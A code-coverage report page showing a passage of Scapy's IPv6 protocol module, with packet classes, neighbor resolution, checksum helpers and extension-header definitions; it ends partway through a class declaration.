Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.8/site-packages/scapy/layers/inet6.py: 52%
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
7# Cool history about this file: http://natisbad.org/scapy/index.html
10"""
11IPv6 (Internet Protocol v6).
12"""
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
77from scapy.packet import bind_layers, Packet, Raw
78from scapy.sendrecv import sendp, sniff, sr, srp1
79from scapy.supersocket import SuperSocket
80from scapy.utils import checksum, strxor
81from scapy.pton_ntop import inet_pton, inet_ntop
82from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
83 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
84 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
85from scapy.volatile import RandInt, RandShort
87if not socket.has_ipv6:
88 raise socket.error("can't use AF_INET6, IPv6 is disabled")
89if not hasattr(socket, "IPPROTO_IPV6"):
90 # Workaround for http://bugs.python.org/issue6926
91 socket.IPPROTO_IPV6 = 41
92if not hasattr(socket, "IPPROTO_IPIP"):
93 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
94 socket.IPPROTO_IPIP = 4
96if conf.route6 is None:
97 # unused import, only to initialize conf.route6
98 import scapy.route6 # noqa: F401
100##########################
101# Neighbor cache stuff #
102##########################
104conf.netcache.new_cache("in6_neighbor", 120)
107@conf.commands.register
108def neighsol(addr, src, iface, timeout=1, chainCC=0):
109 """Sends and receive an ICMPv6 Neighbor Solicitation message
111 This function sends an ICMPv6 Neighbor Solicitation message
112 to get the MAC address of the neighbor with specified IPv6 address address.
114 'src' address is used as the source IPv6 address of the message. Message
115 is sent on 'iface'. The source MAC address is retrieved accordingly.
117 By default, timeout waiting for an answer is 1 second.
119 If no answer is gathered, None is returned. Else, the answer is
120 returned (ethernet frame).
121 """
123 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
124 d = inet_ntop(socket.AF_INET6, nsma)
125 dm = in6_getnsmac(nsma)
126 sm = get_if_hwaddr(iface)
127 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255)
128 p /= ICMPv6ND_NS(tgt=addr)
129 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm)
130 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
131 chainCC=chainCC)
133 return res
136@conf.commands.register
137def getmacbyip6(ip6, chainCC=0):
138 """Returns the MAC address corresponding to an IPv6 address
140 neighborCache.get() method is used on instantiated neighbor cache.
141 Resolution mechanism is described in associated doc string.
143 (chainCC parameter value ends up being passed to sending function
144 used to perform the resolution, if needed)
145 """
147 if isinstance(ip6, Net6):
148 ip6 = str(ip6)
150 if in6_ismaddr(ip6): # Multicast
151 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
152 return mac
154 iff, a, nh = conf.route6.route(ip6)
156 if iff == conf.loopback_name:
157 return "ff:ff:ff:ff:ff:ff"
159 if nh != '::':
160 ip6 = nh # Found next hop
162 mac = conf.netcache.in6_neighbor.get(ip6)
163 if mac:
164 return mac
166 res = neighsol(ip6, a, iff, chainCC=chainCC)
168 if res is not None:
169 if ICMPv6NDOptDstLLAddr in res:
170 mac = res[ICMPv6NDOptDstLLAddr].lladdr
171 else:
172 mac = res.src
173 conf.netcache.in6_neighbor[ip6] = mac
174 return mac
176 return None
179#############################################################################
180#############################################################################
181# IPv6 Class #
182#############################################################################
183#############################################################################
185ipv6nh = {0: "Hop-by-Hop Option Header",
186 4: "IP",
187 6: "TCP",
188 17: "UDP",
189 41: "IPv6",
190 43: "Routing Header",
191 44: "Fragment Header",
192 47: "GRE",
193 50: "ESP Header",
194 51: "AH Header",
195 58: "ICMPv6",
196 59: "No Next Header",
197 60: "Destination Option Header",
198 112: "VRRP",
199 132: "SCTP",
200 135: "Mobility Header"}
202ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
203 4: "IP",
204 6: "TCP",
205 17: "UDP",
206 43: "IPv6ExtHdrRouting",
207 44: "IPv6ExtHdrFragment",
208 50: "ESP",
209 51: "AH",
210 58: "ICMPv6Unknown",
211 59: "Raw",
212 60: "IPv6ExtHdrDestOpt"}
215class IP6ListField(StrField):
216 __slots__ = ["count_from", "length_from"]
217 islist = 1
219 def __init__(self, name, default, count_from=None, length_from=None):
220 if default is None:
221 default = []
222 StrField.__init__(self, name, default)
223 self.count_from = count_from
224 self.length_from = length_from
226 def i2len(self, pkt, i):
227 return 16 * len(i)
229 def i2count(self, pkt, i):
230 if isinstance(i, list):
231 return len(i)
232 return 0
234 def getfield(self, pkt, s):
235 c = tmp_len = None
236 if self.length_from is not None:
237 tmp_len = self.length_from(pkt)
238 elif self.count_from is not None:
239 c = self.count_from(pkt)
241 lst = []
242 ret = b""
243 remain = s
244 if tmp_len is not None:
245 remain, ret = s[:tmp_len], s[tmp_len:]
246 while remain:
247 if c is not None:
248 if c <= 0:
249 break
250 c -= 1
251 addr = inet_ntop(socket.AF_INET6, remain[:16])
252 lst.append(addr)
253 remain = remain[16:]
254 return remain + ret, lst
256 def i2m(self, pkt, x):
257 s = b""
258 for y in x:
259 try:
260 y = inet_pton(socket.AF_INET6, y)
261 except Exception:
262 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
263 y = inet_pton(socket.AF_INET6, y)
264 s += y
265 return s
267 def i2repr(self, pkt, x):
268 s = []
269 if x is None:
270 return "[]"
271 for y in x:
272 s.append('%s' % y)
273 return "[ %s ]" % (", ".join(s))
276class _IPv6GuessPayload:
277 name = "Dummy class that implements guess_payload_class() for IPv6"
279 def default_payload_class(self, p):
280 if self.nh == 58: # ICMPv6
281 t = orb(p[0])
282 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
283 return _niquery_guesser(p)
284 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501
285 if t == 130 and len(p) >= 28:
286 # RFC 3810 - 8.1. Query Version Distinctions
287 return ICMPv6MLQuery2
288 return icmp6typescls.get(t, Raw)
289 return Raw
290 elif self.nh == 135 and len(p) > 3: # Mobile IPv6
291 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
292 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
293 return IPv6ExtHdrSegmentRouting
294 return ipv6nhcls.get(self.nh, Raw)
297class IPv6(_IPv6GuessPayload, Packet, IPTools):
298 name = "IPv6"
299 fields_desc = [BitField("version", 6, 4),
300 BitField("tc", 0, 8),
301 BitField("fl", 0, 20),
302 ShortField("plen", None),
303 ByteEnumField("nh", 59, ipv6nh),
304 ByteField("hlim", 64),
305 SourceIP6Field("src", "dst"), # dst is for src @ selection
306 DestIP6Field("dst", "::1")]
308 def route(self):
309 """Used to select the L2 address"""
310 dst = self.dst
311 if isinstance(dst, Gen):
312 dst = next(iter(dst))
313 return conf.route6.route(dst)
315 def mysummary(self):
316 return "%s > %s (%i)" % (self.src, self.dst, self.nh)
318 def post_build(self, p, pay):
319 p += pay
320 if self.plen is None:
321 tmp_len = len(p) - 40
322 p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
323 return p
325 def extract_padding(self, data):
326 """Extract the IPv6 payload"""
328 if self.plen == 0 and self.nh == 0 and len(data) >= 8:
329 # Extract Hop-by-Hop extension length
330 hbh_len = orb(data[1])
331 hbh_len = 8 + hbh_len * 8
333 # Extract length from the Jumbogram option
334 # Note: the following algorithm take advantage of the Jumbo option
335 # mandatory alignment (4n + 2, RFC2675 Section 2)
336 jumbo_len = None
337 idx = 0
338 offset = 4 * idx + 2
339 while offset <= len(data):
340 opt_type = orb(data[offset])
341 if opt_type == 0xc2: # Jumbo option
342 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501
343 break
344 offset = 4 * idx + 2
345 idx += 1
347 if jumbo_len is None:
348 log_runtime.info("Scapy did not find a Jumbo option")
349 jumbo_len = 0
351 tmp_len = hbh_len + jumbo_len
352 else:
353 tmp_len = self.plen
355 return data[:tmp_len], data[tmp_len:]
357 def hashret(self):
358 if self.nh == 58 and isinstance(self.payload, _ICMPv6):
359 if self.payload.type < 128:
360 return self.payload.payload.hashret()
361 elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
362 return struct.pack("B", self.nh) + self.payload.hashret()
364 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
365 return self.payload.hashret()
367 nh = self.nh
368 sd = self.dst
369 ss = self.src
370 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
371 # With routing header, the destination is the last
372 # address of the IPv6 list if segleft > 0
373 nh = self.payload.nh
374 try:
375 sd = self.addresses[-1]
376 except IndexError:
377 sd = '::1'
378 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501
379 # could be anything from the original list ...
380 if 1:
381 sd = inet_pton(socket.AF_INET6, sd)
382 for a in self.addresses:
383 a = inet_pton(socket.AF_INET6, a)
384 sd = strxor(sd, a)
385 sd = inet_ntop(socket.AF_INET6, sd)
387 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
388 # With segment routing header (rh == 4), the destination is
389 # the first address of the IPv6 addresses list
390 try:
391 sd = self.addresses[0]
392 except IndexError:
393 sd = self.dst
395 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
396 nh = self.payload.nh
398 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
399 nh = self.payload.nh
401 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
402 foundhao = None
403 for o in self.payload.options:
404 if isinstance(o, HAO):
405 foundhao = o
406 if foundhao:
407 ss = foundhao.hoa
408 nh = self.payload.nh # XXX what if another extension follows ?
410 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
411 sd = inet_pton(socket.AF_INET6, sd)
412 ss = inet_pton(socket.AF_INET6, ss)
413 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501
414 else:
415 return struct.pack("B", nh) + self.payload.hashret()
417 def answers(self, other):
418 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
419 if self.nh in [4, 41]:
420 return self.payload.answers(other)
421 if isinstance(other, IPv6) and other.nh in [4, 41]:
422 return self.answers(other.payload)
423 if isinstance(other, IP) and other.proto in [4, 41]:
424 return self.answers(other.payload)
425 if not isinstance(other, IPv6): # self is reply, other is request
426 return False
427 if conf.checkIPaddr:
428 # ss = inet_pton(socket.AF_INET6, self.src)
429 sd = inet_pton(socket.AF_INET6, self.dst)
430 os = inet_pton(socket.AF_INET6, other.src)
431 od = inet_pton(socket.AF_INET6, other.dst)
432 # request was sent to a multicast address (other.dst)
433 # Check reply destination addr matches request source addr (i.e
434 # sd == os) except when reply is multicasted too
435 # XXX test mcast scope matching ?
436 if in6_ismaddr(other.dst):
437 if in6_ismaddr(self.dst):
438 if ((od == sd) or
439 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501
440 return self.payload.answers(other.payload)
441 return False
442 if (os == sd):
443 return self.payload.answers(other.payload)
444 return False
445 elif (sd != os): # or ss != od): <- removed for ICMP errors
446 return False
447 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501
448 # ICMPv6 Error message -> generated by IPv6 packet
449 # Note : at the moment, we jump the ICMPv6 specific class
450 # to call answers() method of erroneous packet (over
451 # initial packet). There can be cases where an ICMPv6 error
452 # class could implement a specific answers method that perform
453 # a specific task. Currently, don't see any use ...
454 return self.payload.payload.answers(other)
455 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
456 return self.payload.answers(other.payload)
457 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
458 return self.payload.answers(other.payload.payload)
459 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
460 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
461 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
462 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
463 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
464 return self.payload.answers(other.payload.payload)
465 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501
466 return self.payload.payload.answers(other.payload)
467 else:
468 if (self.nh != other.nh):
469 return False
470 return self.payload.answers(other.payload)
473class IPv46(IP):
474 """
475 This class implements a dispatcher that is used to detect the IP version
476 while parsing Raw IP pcap files.
477 """
478 @classmethod
479 def dispatch_hook(cls, _pkt=None, *_, **kargs):
480 if _pkt:
481 if orb(_pkt[0]) >> 4 == 6:
482 return IPv6
483 elif kargs.get("version") == 6:
484 return IPv6
485 return IP
488def inet6_register_l3(l2, l3):
489 """
490 Resolves the default L2 destination address when IPv6 is used.
491 """
492 return getmacbyip6(l3.dst)
495conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
498class IPerror6(IPv6):
499 name = "IPv6 in ICMPv6"
501 def answers(self, other):
502 if not isinstance(other, IPv6):
503 return False
504 sd = inet_pton(socket.AF_INET6, self.dst)
505 ss = inet_pton(socket.AF_INET6, self.src)
506 od = inet_pton(socket.AF_INET6, other.dst)
507 os = inet_pton(socket.AF_INET6, other.src)
509 # Make sure that the ICMPv6 error is related to the packet scapy sent
510 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
512 # find upper layer for self (possible citation)
513 selfup = self.payload
514 while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
515 selfup = selfup.payload
517 # find upper layer for other (initial packet). Also look for RH
518 otherup = other.payload
519 request_has_rh = False
520 while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
521 if isinstance(otherup, IPv6ExtHdrRouting):
522 request_has_rh = True
523 otherup = otherup.payload
525 if ((ss == os and sd == od) or # < Basic case
526 (ss == os and request_has_rh)):
527 # ^ Request has a RH : don't check dst address
529 # Let's deal with possible MSS Clamping
530 if (isinstance(selfup, TCP) and
531 isinstance(otherup, TCP) and
532 selfup.options != otherup.options): # seems clamped
534 # Save fields modified by MSS clamping
535 old_otherup_opts = otherup.options
536 old_otherup_cksum = otherup.chksum
537 old_otherup_dataofs = otherup.dataofs
538 old_selfup_opts = selfup.options
539 old_selfup_cksum = selfup.chksum
540 old_selfup_dataofs = selfup.dataofs
542 # Nullify them
543 otherup.options = []
544 otherup.chksum = 0
545 otherup.dataofs = 0
546 selfup.options = []
547 selfup.chksum = 0
548 selfup.dataofs = 0
550 # Test it and save result
551 s1 = raw(selfup)
552 s2 = raw(otherup)
553 tmp_len = min(len(s1), len(s2))
554 res = s1[:tmp_len] == s2[:tmp_len]
556 # recall saved values
557 otherup.options = old_otherup_opts
558 otherup.chksum = old_otherup_cksum
559 otherup.dataofs = old_otherup_dataofs
560 selfup.options = old_selfup_opts
561 selfup.chksum = old_selfup_cksum
562 selfup.dataofs = old_selfup_dataofs
564 return res
566 s1 = raw(selfup)
567 s2 = raw(otherup)
568 tmp_len = min(len(s1), len(s2))
569 return s1[:tmp_len] == s2[:tmp_len]
571 return False
573 def mysummary(self):
574 return Packet.mysummary(self)
577#############################################################################
578#############################################################################
579# Upper Layer Checksum computation #
580#############################################################################
581#############################################################################
583class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
584 name = "Pseudo IPv6 Header"
585 fields_desc = [IP6Field("src", "::"),
586 IP6Field("dst", "::"),
587 IntField("uplen", None),
588 BitField("zero", 0, 24),
589 ByteField("nh", 0)]
592def in6_pseudoheader(nh, u, plen):
593 # type: (int, IP, int) -> PseudoIPv6
594 """
595 Build an PseudoIPv6 instance as specified in RFC 2460 8.1
597 This function operates by filling a pseudo header class instance
598 (PseudoIPv6) with:
599 - Next Header value
600 - the address of _final_ destination (if some Routing Header with non
601 segleft field is present in underlayer classes, last address is used.)
602 - the address of _real_ source (basically the source address of an
603 IPv6 class instance available in the underlayer or the source address
604 in HAO option if some Destination Option header found in underlayer
605 includes this option).
606 - the length is the length of provided payload string ('p')
608 :param nh: value of upper layer protocol
609 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
610 provided with all under layers (IPv6 and all extension headers,
611 for example)
612 :param plen: the length of the upper layer and payload
613 """
614 ph6 = PseudoIPv6()
615 ph6.nh = nh
616 rthdr = 0
617 hahdr = 0
618 final_dest_addr_found = 0
619 while u is not None and not isinstance(u, IPv6):
620 if (isinstance(u, IPv6ExtHdrRouting) and
621 u.segleft != 0 and len(u.addresses) != 0 and
622 final_dest_addr_found == 0):
623 rthdr = u.addresses[-1]
624 final_dest_addr_found = 1
625 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
626 u.segleft != 0 and len(u.addresses) != 0 and
627 final_dest_addr_found == 0):
628 rthdr = u.addresses[0]
629 final_dest_addr_found = 1
630 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
631 isinstance(u.options[0], HAO)):
632 hahdr = u.options[0].hoa
633 u = u.underlayer
634 if u is None:
635 warning("No IPv6 underlayer to compute checksum. Leaving null.")
636 return None
637 if hahdr:
638 ph6.src = hahdr
639 else:
640 ph6.src = u.src
641 if rthdr:
642 ph6.dst = rthdr
643 else:
644 ph6.dst = u.dst
645 ph6.uplen = plen
646 return ph6
649def in6_chksum(nh, u, p):
650 """
651 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
653 See also `.in6_pseudoheader`
655 :param nh: value of upper layer protocol
656 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
657 provided with all under layers (IPv6 and all extension headers,
658 for example)
659 :param p: the payload of the upper layer provided as a string
660 """
661 ph6 = in6_pseudoheader(nh, u, len(p))
662 if ph6 is None:
663 return 0
664 ph6s = raw(ph6)
665 return checksum(ph6s + p)
668#############################################################################
669#############################################################################
670# Extension Headers #
671#############################################################################
672#############################################################################
675# Inherited by all extension header classes
676class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
677 name = 'Abstract IPv6 Option Header'
678 aliastypes = [IPv6, IPerror6] # TODO ...
681# IPv6 options for Extension Headers #
683_hbhopts = {0x00: "Pad1",
684 0x01: "PadN",
685 0x04: "Tunnel Encapsulation Limit",
686 0x05: "Router Alert",
687 0x06: "Quick-Start",
688 0xc2: "Jumbo Payload",
689 0xc9: "Home Address Option"}
692class _OTypeField(ByteEnumField):
693 """
694 Modified BytEnumField that displays information regarding the IPv6 option
695 based on its option type value (What should be done by nodes that process
696 the option if they do not understand it ...)
698 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
699 """
700 pol = {0x00: "00: skip",
701 0x40: "01: discard",
702 0x80: "10: discard+ICMP",
703 0xC0: "11: discard+ICMP not mcast"}
705 enroutechange = {0x00: "0: Don't change en-route",
706 0x20: "1: May change en-route"}
708 def i2repr(self, pkt, x):
709 s = self.i2s.get(x, repr(x))
710 polstr = self.pol[(x & 0xC0)]
711 enroutechangestr = self.enroutechange[(x & 0x20)]
712 return "%s [%s, %s]" % (s, polstr, enroutechangestr)
715class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
716 name = "Scapy6 Unknown Option"
717 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
718 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
719 StrLenField("optdata", "",
720 length_from=lambda pkt: pkt.optlen)]
722 def alignment_delta(self, curpos): # By default, no alignment requirement
723 """
724 As specified in section 4.2 of RFC 2460, every options has
725 an alignment requirement usually expressed xn+y, meaning
726 the Option Type must appear at an integer multiple of x octets
727 from the start of the header, plus y octets.
729 That function is provided the current position from the
730 start of the header and returns required padding length.
731 """
732 return 0
734 @classmethod
735 def dispatch_hook(cls, _pkt=None, *args, **kargs):
736 if _pkt:
737 o = orb(_pkt[0]) # Option type
738 if o in _hbhoptcls:
739 return _hbhoptcls[o]
740 return cls
742 def extract_padding(self, p):
743 return b"", p
746class Pad1(Packet): # IPv6 Hop-By-Hop Option
747 name = "Pad1"
748 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
750 def alignment_delta(self, curpos): # No alignment requirement
751 return 0
753 def extract_padding(self, p):
754 return b"", p
757class PadN(Packet): # IPv6 Hop-By-Hop Option
758 name = "PadN"
759 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
760 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
761 StrLenField("optdata", "",
762 length_from=lambda pkt: pkt.optlen)]
764 def alignment_delta(self, curpos): # No alignment requirement
765 return 0
767 def extract_padding(self, p):
768 return b"", p
771class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
772 name = "Router Alert"
773 fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
774 ByteField("optlen", 2),
775 ShortEnumField("value", None,
776 {0: "Datagram contains a MLD message",
777 1: "Datagram contains RSVP message",
778 2: "Datagram contains an Active Network message", # noqa: E501
779 68: "NSIS NATFW NSLP",
780 69: "MPLS OAM",
781 65535: "Reserved"})]
782 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501
783 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501
784 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501
785 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
787 def alignment_delta(self, curpos): # alignment requirement : 2n+0
788 x = 2
789 y = 0
790 delta = x * ((curpos - y + x - 1) // x) + y - curpos
791 return delta
793 def extract_padding(self, p):
794 return b"", p
797class RplOption(Packet): # RFC 6553 - RPL Option
798 name = "RPL Option"
799 fields_desc = [_OTypeField("otype", 0x63, _hbhopts),
800 ByteField("optlen", 4),
801 BitField("Down", 0, 1),
802 BitField("RankError", 0, 1),
803 BitField("ForwardError", 0, 1),
804 BitField("unused", 0, 5),
805 XByteField("RplInstanceId", 0),
806 XShortField("SenderRank", 0)]
808 def alignment_delta(self, curpos): # alignment requirement : 2n+0
809 x = 2
810 y = 0
811 delta = x * ((curpos - y + x - 1) // x) + y - curpos
812 return delta
814 def extract_padding(self, p):
815 return b"", p
818class Jumbo(Packet): # IPv6 Hop-By-Hop Option
819 name = "Jumbo Payload"
820 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
821 ByteField("optlen", 4),
822 IntField("jumboplen", None)]
824 def alignment_delta(self, curpos): # alignment requirement : 4n+2
825 x = 4
826 y = 2
827 delta = x * ((curpos - y + x - 1) // x) + y - curpos
828 return delta
830 def extract_padding(self, p):
831 return b"", p
834class HAO(Packet): # IPv6 Destination Options Header Option
835 name = "Home Address Option"
836 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
837 ByteField("optlen", 16),
838 IP6Field("hoa", "::")]
840 def alignment_delta(self, curpos): # alignment requirement : 8n+6
841 x = 8
842 y = 6
843 delta = x * ((curpos - y + x - 1) // x) + y - curpos
844 return delta
846 def extract_padding(self, p):
847 return b"", p
850_hbhoptcls = {0x00: Pad1,
851 0x01: PadN,
852 0x05: RouterAlert,
853 0x63: RplOption,
854 0xC2: Jumbo,
855 0xC9: HAO}
858# Hop-by-Hop Extension Header #
860class _OptionsField(PacketListField):
861 __slots__ = ["curpos"]
863 def __init__(self, name, default, cls, curpos, *args, **kargs):
864 self.curpos = curpos
865 PacketListField.__init__(self, name, default, cls, *args, **kargs)
867 def i2len(self, pkt, i):
868 return len(self.i2m(pkt, i))
870 def i2m(self, pkt, x):
871 autopad = None
872 try:
873 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
874 except Exception:
875 autopad = 1
877 if not autopad:
878 return b"".join(map(bytes, x))
880 curpos = self.curpos
881 s = b""
882 for p in x:
883 d = p.alignment_delta(curpos)
884 curpos += d
885 if d == 1:
886 s += raw(Pad1())
887 elif d != 0:
888 s += raw(PadN(optdata=b'\x00' * (d - 2)))
889 pstr = raw(p)
890 curpos += len(pstr)
891 s += pstr
893 # Let's make the class including our option field
894 # a multiple of 8 octets long
895 d = curpos % 8
896 if d == 0:
897 return s
898 d = 8 - d
899 if d == 1:
900 s += raw(Pad1())
901 elif d != 0:
902 s += raw(PadN(optdata=b'\x00' * (d - 2)))
904 return s
906 def addfield(self, pkt, s, val):
907 return s + self.i2m(pkt, val)
910class _PhantomAutoPadField(ByteField):
911 def addfield(self, pkt, s, val):
912 return s
914 def getfield(self, pkt, s):
915 return s, 1
917 def i2repr(self, pkt, x):
918 if x:
919 return "On"
920 return "Off"
923class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
924 name = "IPv6 Extension Header - Hop-by-Hop Options Header"
925 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
926 FieldLenField("len", None, length_of="options", fmt="B",
927 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
928 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
929 _OptionsField("options", [], HBHOptUnknown, 2,
930 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
931 overload_fields = {IPv6: {"nh": 0}}
934# Destination Option Header #
936class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
937 name = "IPv6 Extension Header - Destination Options Header"
938 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
939 FieldLenField("len", None, length_of="options", fmt="B",
940 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
941 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
942 _OptionsField("options", [], HBHOptUnknown, 2,
943 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
944 overload_fields = {IPv6: {"nh": 60}}
947# Routing Header #
949class IPv6ExtHdrRouting(_IPv6ExtHdr):
950 name = "IPv6 Option Header Routing"
951 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
952 FieldLenField("len", None, count_of="addresses", fmt="B",
953 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501
954 ByteField("type", 0),
955 ByteField("segleft", None),
956 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501
957 IP6ListField("addresses", [],
958 length_from=lambda pkt: 8 * pkt.len)]
959 overload_fields = {IPv6: {"nh": 43}}
961 def post_build(self, pkt, pay):
962 if self.segleft is None:
963 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
964 return _IPv6ExtHdr.post_build(self, pkt, pay)
967# Segment Routing Header #
969# This implementation is based on RFC8754, but some older snippets come from:
970# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
972_segment_routing_header_tlvs = {
973 # RFC 8754 sect 8.2
974 0: "Pad1 TLV",
975 1: "Ingress Node TLV", # draft 06
976 2: "Egress Node TLV", # draft 06
977 4: "PadN TLV",
978 5: "HMAC TLV",
979}
982class IPv6ExtHdrSegmentRoutingTLV(Packet):
983 name = "IPv6 Option Header Segment Routing - Generic TLV"
984 # RFC 8754 sect 2.1
985 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
986 ByteField("len", 0),
987 StrLenField("value", "", length_from=lambda pkt: pkt.len)]
989 def extract_padding(self, p):
990 return b"", p
992 registered_sr_tlv = {}
994 @classmethod
995 def register_variant(cls):
996 cls.registered_sr_tlv[cls.type.default] = cls
998 @classmethod
999 def dispatch_hook(cls, pkt=None, *args, **kargs):
1000 if pkt:
1001 tmp_type = ord(pkt[:1])
1002 return cls.registered_sr_tlv.get(tmp_type, cls)
1003 return cls
1006class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
1007 name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
1008 # draft-ietf-6man-segment-routing-header-06 3.1.1
1009 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
1010 ByteField("len", 18),
1011 ByteField("reserved", 0),
1012 ByteField("flags", 0),
1013 IP6Field("ingress_node", "::1")]
1016class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
